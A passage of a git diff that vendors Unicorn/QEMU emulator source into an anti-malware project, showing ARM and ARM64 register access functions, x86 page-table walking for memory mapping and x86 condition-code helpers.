UC_ARM64_REG_PAR_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.par_el1; + break; + case UC_ARM64_REG_MAIR_EL1: + *(uint64_t *)value = ARM_CPU(uc, mycpu)->env.cp15.mair_el1; + break; + } + } + } + + return 0; +} + +int arm64_reg_write(struct uc_struct *uc, unsigned int *regs, void* const* vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { + regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; + } + if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { + ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_X0] = *(uint64_t *)value; + } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { + WRITE_DWORD(ARM_CPU(uc, mycpu)->env.xregs[regid - UC_ARM64_REG_W0], *(uint32_t *)value); + } else if (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) { + float64 *src = (float64*) value; + uint32_t reg_index = 2*(regid - UC_ARM64_REG_Q0); + ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index] = src[0]; + ARM_CPU(uc, mycpu)->env.vfp.regs[reg_index+1] = src[1]; + } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { + ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_D0)] = * (float64*) value; + } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { + WRITE_DWORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_S0)], *(int32_t*) value); + } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { + WRITE_WORD(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_H0)], *(int16_t*) value); + } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { + WRITE_BYTE_L(ARM_CPU(uc, mycpu)->env.vfp.regs[2*(regid - UC_ARM64_REG_B0)], *(int8_t*) value); + } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { + ARM_CPU(uc, mycpu)->env.elr_el[regid - UC_ARM64_REG_ELR_EL0] = *(uint64_t*)value; + } else if (regid >= 
UC_ARM64_REG_SP_EL0 && regid <= UC_ARM64_REG_SP_EL3) { + ARM_CPU(uc, mycpu)->env.sp_el[regid - UC_ARM64_REG_SP_EL0] = *(uint64_t*)value; + } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { + ARM_CPU(uc, mycpu)->env.cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0] = *(uint64_t*)value; + } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { + ARM_CPU(uc, mycpu)->env.cp15.far_el[regid - UC_ARM64_REG_FAR_EL0] = *(uint64_t*)value; + } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { + ARM_CPU(uc, mycpu)->env.cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0] = *(uint64_t*)value; + } else { + switch(regid) { + default: break; + case UC_ARM64_REG_CPACR_EL1: + ARM_CPU(uc, mycpu)->env.cp15.c1_coproc = *(uint32_t *)value; + break; + case UC_ARM64_REG_TPIDR_EL0: + ARM_CPU(uc, mycpu)->env.cp15.tpidr_el0 = *(uint64_t *)value; + break; + case UC_ARM64_REG_TPIDRRO_EL0: + ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0 = *(uint64_t *)value; + break; + case UC_ARM64_REG_TPIDR_EL1: + ARM_CPU(uc, mycpu)->env.cp15.tpidr_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_X29: + ARM_CPU(uc, mycpu)->env.xregs[29] = *(uint64_t *)value; + break; + case UC_ARM64_REG_X30: + ARM_CPU(uc, mycpu)->env.xregs[30] = *(uint64_t *)value; + break; + case UC_ARM64_REG_PC: + ARM_CPU(uc, mycpu)->env.pc = *(uint64_t *)value; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + case UC_ARM64_REG_SP: + ARM_CPU(uc, mycpu)->env.xregs[31] = *(uint64_t *)value; + break; + case UC_ARM64_REG_NZCV: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, CPSR_NZCV); + break; + case UC_ARM64_REG_PSTATE: + pstate_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value); + break; + case UC_ARM64_REG_TTBR0_EL1: + ARM_CPU(uc, mycpu)->env.cp15.ttbr0_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_TTBR1_EL1: + ARM_CPU(uc, mycpu)->env.cp15.ttbr1_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_PAR_EL1: + 
ARM_CPU(uc, mycpu)->env.cp15.par_el1 = *(uint64_t *)value; + break; + case UC_ARM64_REG_MAIR_EL1: + ARM_CPU(uc, mycpu)->env.cp15.mair_el1 = *(uint64_t *)value; + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +#ifdef TARGET_WORDS_BIGENDIAN +void arm64eb_uc_init(struct uc_struct* uc) +#else +void arm64_uc_init(struct uc_struct* uc) +#endif +{ + register_accel_types(uc); + arm_cpu_register_types(uc); + aarch64_cpu_register_types(uc); + machvirt_machine_init(uc); + uc->reg_read = arm64_reg_read; + uc->reg_write = arm64_reg_write; + uc->reg_reset = arm64_reg_reset; + uc->set_pc = arm64_set_pc; + uc->release = arm64_release; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_arm.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_arm.c new file mode 100644 index 0000000..d5b9a7d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/unicorn_arm.c @@ -0,0 +1,243 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/arm/arm.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + +const int ARM_REGS_STORAGE_SIZE = offsetof(CPUARMState, tlb_table); + +static void arm_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUARMState *)uc->current_cpu->env_ptr)->pc = address; + ((CPUARMState *)uc->current_cpu->env_ptr)->regs[15] = address; +} + +void arm_release(void* ctx); + +void arm_release(void* ctx) +{ + ARMCPU* cpu; + struct uc_struct* uc; + TCGContext *s = (TCGContext *) ctx; + + g_free(s->tb_ctx.tbs); + uc = s->uc; + cpu = (ARMCPU*) uc->cpu; + g_free(cpu->cpreg_indexes); + g_free(cpu->cpreg_values); + g_free(cpu->cpreg_vmstate_indexes); + g_free(cpu->cpreg_vmstate_values); + + release_common(ctx); +} + +void arm_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env; + (void)uc; + + env = uc->cpu->env_ptr; + memset(env->regs, 0, sizeof(env->regs)); + + 
env->pc = 0; +} + +/* these functions are implemented in helper.c. */ +#include "exec/helper-head.h" +uint32_t HELPER(v7m_mrs)(CPUARMState *env, uint32_t reg); +void HELPER(v7m_msr)(CPUARMState *env, uint32_t reg, uint32_t val); + +int arm_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu; + int i; + + mycpu = uc->cpu; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[regid - UC_ARM_REG_R0]; + else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) + *(float64 *)value = ARM_CPU(uc, mycpu)->env.vfp.regs[regid - UC_ARM_REG_D0]; + else { + switch(regid) { + case UC_ARM_REG_APSR: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env) & (CPSR_NZCV | CPSR_Q | CPSR_GE); + break; + case UC_ARM_REG_APSR_NZCV: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env) & CPSR_NZCV; + break; + case UC_ARM_REG_CPSR: + *(int32_t *)value = cpsr_read(&ARM_CPU(uc, mycpu)->env); + break; + case UC_ARM_REG_SPSR: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.spsr; + break; + //case UC_ARM_REG_SP: + case UC_ARM_REG_R13: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[13]; + break; + //case UC_ARM_REG_LR: + case UC_ARM_REG_R14: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[14]; + break; + //case UC_ARM_REG_PC: + case UC_ARM_REG_R15: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.regs[15]; + break; + case UC_ARM_REG_C1_C0_2: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.cp15.c1_coproc; + break; + case UC_ARM_REG_C13_C0_3: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0; + break; + case UC_ARM_REG_FPEXC: + *(int32_t *)value = ARM_CPU(uc, mycpu)->env.vfp.xregs[ARM_VFP_FPEXC]; + break; + case UC_ARM_REG_IPSR: + *(uint32_t *)value = xpsr_read(&ARM_CPU(uc, mycpu)->env) & 0x1ff; + break; + case UC_ARM_REG_MSP: + *(uint32_t *)value = helper_v7m_mrs(&ARM_CPU(uc, mycpu)->env, 
8); + break; + case UC_ARM_REG_PSP: + *(uint32_t *)value = helper_v7m_mrs(&ARM_CPU(uc, mycpu)->env, 9); + break; + case UC_ARM_REG_CONTROL: + *(uint32_t *)value = helper_v7m_mrs(&ARM_CPU(uc, mycpu)->env, 20); + break; + } + } + } + + return 0; +} + +int arm_reg_write(struct uc_struct *uc, unsigned int *regs, void* const* vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_ARM_REG_R0 && regid <= UC_ARM_REG_R12) + ARM_CPU(uc, mycpu)->env.regs[regid - UC_ARM_REG_R0] = *(uint32_t *)value; + else if (regid >= UC_ARM_REG_D0 && regid <= UC_ARM_REG_D31) + ARM_CPU(uc, mycpu)->env.vfp.regs[regid - UC_ARM_REG_D0] = *(float64 *)value; + else { + switch(regid) { + case UC_ARM_REG_APSR: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, (CPSR_NZCV | CPSR_Q | CPSR_GE)); + break; + case UC_ARM_REG_APSR_NZCV: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, CPSR_NZCV); + break; + case UC_ARM_REG_CPSR: + cpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, ~0); + break; + case UC_ARM_REG_SPSR: + ARM_CPU(uc, mycpu)->env.spsr = *(uint32_t *)value; + break; + //case UC_ARM_REG_SP: + case UC_ARM_REG_R13: + ARM_CPU(uc, mycpu)->env.regs[13] = *(uint32_t *)value; + break; + //case UC_ARM_REG_LR: + case UC_ARM_REG_R14: + ARM_CPU(uc, mycpu)->env.regs[14] = *(uint32_t *)value; + break; + //case UC_ARM_REG_PC: + case UC_ARM_REG_R15: + ARM_CPU(uc, mycpu)->env.pc = (*(uint32_t *)value & ~1); + ARM_CPU(uc, mycpu)->env.thumb = (*(uint32_t *)value & 1); + ARM_CPU(uc, mycpu)->env.uc->thumb = (*(uint32_t *)value & 1); + ARM_CPU(uc, mycpu)->env.regs[15] = (*(uint32_t *)value & ~1); + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + + break; + case UC_ARM_REG_C1_C0_2: + ARM_CPU(uc, mycpu)->env.cp15.c1_coproc = *(int32_t *)value; + break; + + case UC_ARM_REG_C13_C0_3: + ARM_CPU(uc, mycpu)->env.cp15.tpidrro_el0 = *(int32_t 
*)value; + break; + case UC_ARM_REG_FPEXC: + ARM_CPU(uc, mycpu)->env.vfp.xregs[ARM_VFP_FPEXC] = *(int32_t *)value; + break; + case UC_ARM_REG_IPSR: + xpsr_write(&ARM_CPU(uc, mycpu)->env, *(uint32_t *)value, 0x1ff); + break; + case UC_ARM_REG_MSP: + helper_v7m_msr(&ARM_CPU(uc, mycpu)->env, 8, *(uint32_t *)value); + break; + case UC_ARM_REG_PSP: + helper_v7m_msr(&ARM_CPU(uc, mycpu)->env, 9, *(uint32_t *)value); + break; + case UC_ARM_REG_CONTROL: + helper_v7m_msr(&ARM_CPU(uc, mycpu)->env, 20, *(uint32_t *)value); + break; + } + } + } + + return 0; +} + +static bool arm_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case EXCP_UDEF: + case EXCP_YIELD: + return true; + } +} + +static uc_err arm_query(struct uc_struct *uc, uc_query_type type, size_t *result) +{ + CPUState *mycpu = uc->cpu; + uint32_t mode; + + switch(type) { + case UC_QUERY_MODE: + // zero out ARM/THUMB mode + mode = uc->mode & ~(UC_MODE_ARM | UC_MODE_THUMB); + // THUMB mode or ARM MOde + mode += ((ARM_CPU(uc, mycpu)->env.thumb != 0)? 
UC_MODE_THUMB : UC_MODE_ARM); + *result = mode; + return UC_ERR_OK; + default: + return UC_ERR_ARG; + } +} + +#ifdef TARGET_WORDS_BIGENDIAN +void armeb_uc_init(struct uc_struct* uc) +#else +void arm_uc_init(struct uc_struct* uc) +#endif +{ + register_accel_types(uc); + arm_cpu_register_types(uc); + tosa_machine_init(uc); + uc->reg_read = arm_reg_read; + uc->reg_write = arm_reg_write; + uc->reg_reset = arm_reg_reset; + uc->set_pc = arm_set_pc; + uc->stop_interrupt = arm_stop_interrupt; + uc->release = arm_release; + uc->query = arm_query; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/Makefile.objs new file mode 100644 index 0000000..98cb3e3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/Makefile.objs @@ -0,0 +1,5 @@ +obj-y += translate.o helper.o cpu.o +obj-y += excp_helper.o fpu_helper.o cc_helper.o int_helper.o svm_helper.o +obj-y += smm_helper.o misc_helper.o mem_helper.o seg_helper.o +obj-$(CONFIG_SOFTMMU) += arch_memory_mapping.o +obj-y += unicorn.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/TODO new file mode 100644 index 0000000..a8d69cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/TODO @@ -0,0 +1,31 @@ +Correctness issues: + +- some eflags manipulation incorrectly reset the bit 0x2. +- SVM: test, cpu save/restore, SMM save/restore. +- x86_64: lcall/ljmp intel/amd differences ? +- better code fetch (different exception handling + CS.limit support) +- user/kernel PUSHL/POPL in helper.c +- add missing cpuid tests +- return UD exception if LOCK prefix incorrectly used +- test ldt limit < 7 ? +- fix some 16 bit sp push/pop overflow (pusha/popa, lcall lret) +- full support of segment limit/rights +- full x87 exception support +- improve x87 bit exactness (use bochs code ?) 
+- DRx register support +- CR0.AC emulation +- SSE alignment checks + +Optimizations/Features: + +- add SVM nested paging support +- add VMX support +- add AVX support +- add SSE5 support +- fxsave/fxrstor AMD extensions +- improve monitor/mwait support +- faster EFLAGS update: consider SZAP, C, O can be updated separately + with a bit field in CC_OP and more state variables. +- evaluate x87 stack pointer statically +- find a way to avoid translating several time the same TB if CR0.TS + is set or not. diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/arch_memory_mapping.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/arch_memory_mapping.c new file mode 100644 index 0000000..e66ebc9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/arch_memory_mapping.c @@ -0,0 +1,279 @@ +/* + * i386 memory mapping + * + * Copyright Fujitsu, Corp. 2011, 2012 + * + * Authors: + * Wen Congyang + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. 
+ * + */ + +#include "cpu.h" +#include "exec/cpu-all.h" +#include "sysemu/memory_mapping.h" + +/* PAE Paging or IA-32e Paging */ +static void walk_pte(MemoryMappingList *list, AddressSpace *as, + hwaddr pte_start_addr, + int32_t a20_mask, target_ulong start_line_addr) +{ + hwaddr pte_addr, start_paddr; + uint64_t pte; + target_ulong start_vaddr; + int i; + + for (i = 0; i < 512; i++) { + pte_addr = (pte_start_addr + i * 8) & a20_mask; + pte = ldq_phys(as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + start_paddr = (pte & ~0xfff) & ~(0x1ULL << 63); + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + + start_vaddr = start_line_addr | ((i & 0x1ff) << 12); + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 12); + } +} + +/* 32-bit Paging */ +static void walk_pte2(MemoryMappingList *list, AddressSpace *as, + hwaddr pte_start_addr, int32_t a20_mask, + target_ulong start_line_addr) +{ + hwaddr pte_addr, start_paddr; + uint32_t pte; + target_ulong start_vaddr; + int i; + + for (i = 0; i < 1024; i++) { + pte_addr = (pte_start_addr + i * 4) & a20_mask; + pte = ldl_phys(as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + start_paddr = pte & ~0xfff; + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + + start_vaddr = start_line_addr | ((i & 0x3ff) << 12); + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 12); + } +} + +/* PAE Paging or IA-32e Paging */ +#define PLM4_ADDR_MASK 0xffffffffff000ULL /* selects bits 51:12 */ + +static void walk_pde(MemoryMappingList *list, AddressSpace *as, + hwaddr pde_start_addr, + int32_t a20_mask, target_ulong start_line_addr) +{ + hwaddr pde_addr, pte_start_addr, start_paddr; + uint64_t pde; + target_ulong line_addr, start_vaddr; + int i; + + for (i = 0; i < 512; i++) { + pde_addr = (pde_start_addr + i * 8) & a20_mask; + pde = ldq_phys(as, 
pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = start_line_addr | ((i & 0x1ff) << 21); + if (pde & PG_PSE_MASK) { + /* 2 MB page */ + start_paddr = (pde & ~0x1fffff) & ~(0x1ULL << 63); + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + start_vaddr = line_addr; + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 21); + continue; + } + + pte_start_addr = (pde & PLM4_ADDR_MASK) & a20_mask; + walk_pte(list, as, pte_start_addr, a20_mask, line_addr); + } +} + +/* 32-bit Paging */ +static void walk_pde2(MemoryMappingList *list, AddressSpace *as, + hwaddr pde_start_addr, int32_t a20_mask, + bool pse) +{ + hwaddr pde_addr, pte_start_addr, start_paddr, high_paddr; + uint32_t pde; + target_ulong line_addr, start_vaddr; + int i; + + for (i = 0; i < 1024; i++) { + pde_addr = (pde_start_addr + i * 4) & a20_mask; + pde = ldl_phys(as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = (((unsigned int)i & 0x3ff) << 22); + if ((pde & PG_PSE_MASK) && pse) { + /* + * 4 MB page: + * bits 39:32 are bits 20:13 of the PDE + * bit3 31:22 are bits 31:22 of the PDE + */ + high_paddr = ((hwaddr)(pde & 0x1fe000) << 19); + start_paddr = (pde & ~0x3fffff) | high_paddr; + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + start_vaddr = line_addr; + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 22); + continue; + } + + pte_start_addr = (pde & ~0xfff) & a20_mask; + walk_pte2(list, as, pte_start_addr, a20_mask, line_addr); + } +} + +/* PAE Paging */ +static void walk_pdpe2(MemoryMappingList *list, AddressSpace *as, + hwaddr pdpe_start_addr, int32_t a20_mask) +{ + hwaddr pdpe_addr, pde_start_addr; + uint64_t pdpe; + target_ulong line_addr; + int i; + + for (i = 0; i < 4; i++) { + pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; + pdpe = ldq_phys(as, pdpe_addr); + if (!(pdpe & 
PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = (((unsigned int)i & 0x3) << 30); + pde_start_addr = (pdpe & ~0xfff) & a20_mask; + walk_pde(list, as, pde_start_addr, a20_mask, line_addr); + } +} + +#ifdef TARGET_X86_64 +/* IA-32e Paging */ +static void walk_pdpe(MemoryMappingList *list, AddressSpace *as, + hwaddr pdpe_start_addr, int32_t a20_mask, + target_ulong start_line_addr) +{ + hwaddr pdpe_addr, pde_start_addr, start_paddr; + uint64_t pdpe; + target_ulong line_addr, start_vaddr; + int i; + + for (i = 0; i < 512; i++) { + pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; + pdpe = ldq_phys(as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = start_line_addr | ((i & 0x1ffULL) << 30); + if (pdpe & PG_PSE_MASK) { + /* 1 GB page */ + start_paddr = (pdpe & ~0x3fffffff) & ~(0x1ULL << 63); + if (cpu_physical_memory_is_io(as, start_paddr)) { + /* I/O region */ + continue; + } + start_vaddr = line_addr; + memory_mapping_list_add_merge_sorted(list, start_paddr, + start_vaddr, 1 << 30); + continue; + } + + pde_start_addr = (pdpe & PLM4_ADDR_MASK) & a20_mask; + walk_pde(list, as, pde_start_addr, a20_mask, line_addr); + } +} + +/* IA-32e Paging */ +static void walk_pml4e(MemoryMappingList *list, AddressSpace *as, + hwaddr pml4e_start_addr, int32_t a20_mask) +{ + hwaddr pml4e_addr, pdpe_start_addr; + uint64_t pml4e; + target_ulong line_addr; + int i; + + for (i = 0; i < 512; i++) { + pml4e_addr = (pml4e_start_addr + i * 8) & a20_mask; + pml4e = ldq_phys(as, pml4e_addr); + if (!(pml4e & PG_PRESENT_MASK)) { + /* not present */ + continue; + } + + line_addr = ((i & 0x1ffULL) << 39) | (0xffffULL << 48); + pdpe_start_addr = (pml4e & PLM4_ADDR_MASK) & a20_mask; + walk_pdpe(list, as, pdpe_start_addr, a20_mask, line_addr); + } +} +#endif + +void x86_cpu_get_memory_mapping(CPUState *cs, MemoryMappingList *list, + Error **errp) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + if 
(!cpu_paging_enabled(cs)) { + /* paging is disabled */ + return; + } + + if (env->cr[4] & CR4_PAE_MASK) { +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + hwaddr pml4e_addr; + + pml4e_addr = (env->cr[3] & PLM4_ADDR_MASK) & env->a20_mask; + walk_pml4e(list, cs->as, pml4e_addr, env->a20_mask); + } else +#endif + { + hwaddr pdpe_addr; + + pdpe_addr = (env->cr[3] & ~0x1f) & env->a20_mask; + walk_pdpe2(list, cs->as, pdpe_addr, env->a20_mask); + } + } else { + hwaddr pde_addr; + bool pse; + + pde_addr = (env->cr[3] & ~0xfff) & env->a20_mask; + pse = !!(env->cr[4] & CR4_PSE_MASK); + walk_pde2(list, cs->as, pde_addr, env->a20_mask, pse); + } +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper.c new file mode 100644 index 0000000..29e3c42 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper.c @@ -0,0 +1,389 @@ +/* + * x86 condition code helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +const uint8_t parity_table[256] = { + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, + 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, +}; + +#define SHIFT 0 +#include "cc_helper_template.h" +#undef SHIFT + +#define SHIFT 1 +#include "cc_helper_template.h" +#undef SHIFT + +#define SHIFT 2 +#include "cc_helper_template.h" +#undef SHIFT + +#ifdef TARGET_X86_64 + +#define SHIFT 3 +#include "cc_helper_template.h" +#undef SHIFT + +#endif + +static target_ulong compute_all_adcx(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + return (src1 & ~CC_C) | (dst * CC_C); +} + +static target_ulong compute_all_adox(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + return (src1 & ~CC_O) | (src2 * CC_O); +} + +static target_ulong compute_all_adcox(target_ulong dst, target_ulong src1, + target_ulong 
src2) +{ + return (src1 & ~(CC_C | CC_O)) | (dst * CC_C) | (src2 * CC_O); +} + +target_ulong helper_cc_compute_all(target_ulong dst, target_ulong src1, + target_ulong src2, int op) +{ + switch (op) { + default: /* should never happen */ + return 0; + + case CC_OP_EFLAGS: + return src1; + case CC_OP_CLR: + return CC_Z | CC_P; + + case CC_OP_MULB: + return compute_all_mulb(dst, src1); + case CC_OP_MULW: + return compute_all_mulw(dst, src1); + case CC_OP_MULL: + return compute_all_mull(dst, src1); + + case CC_OP_ADDB: + return compute_all_addb(dst, src1); + case CC_OP_ADDW: + return compute_all_addw(dst, src1); + case CC_OP_ADDL: + return compute_all_addl(dst, src1); + + case CC_OP_ADCB: + return compute_all_adcb(dst, src1, src2); + case CC_OP_ADCW: + return compute_all_adcw(dst, src1, src2); + case CC_OP_ADCL: + return compute_all_adcl(dst, src1, src2); + + case CC_OP_SUBB: + return compute_all_subb(dst, src1); + case CC_OP_SUBW: + return compute_all_subw(dst, src1); + case CC_OP_SUBL: + return compute_all_subl(dst, src1); + + case CC_OP_SBBB: + return compute_all_sbbb(dst, src1, src2); + case CC_OP_SBBW: + return compute_all_sbbw(dst, src1, src2); + case CC_OP_SBBL: + return compute_all_sbbl(dst, src1, src2); + + case CC_OP_LOGICB: + return compute_all_logicb(dst, src1); + case CC_OP_LOGICW: + return compute_all_logicw(dst, src1); + case CC_OP_LOGICL: + return compute_all_logicl(dst, src1); + + case CC_OP_INCB: + return compute_all_incb(dst, src1); + case CC_OP_INCW: + return compute_all_incw(dst, src1); + case CC_OP_INCL: + return compute_all_incl(dst, src1); + + case CC_OP_DECB: + return compute_all_decb(dst, src1); + case CC_OP_DECW: + return compute_all_decw(dst, src1); + case CC_OP_DECL: + return compute_all_decl(dst, src1); + + case CC_OP_SHLB: + return compute_all_shlb(dst, src1); + case CC_OP_SHLW: + return compute_all_shlw(dst, src1); + case CC_OP_SHLL: + return compute_all_shll(dst, src1); + + case CC_OP_SARB: + return compute_all_sarb(dst, src1); + case 
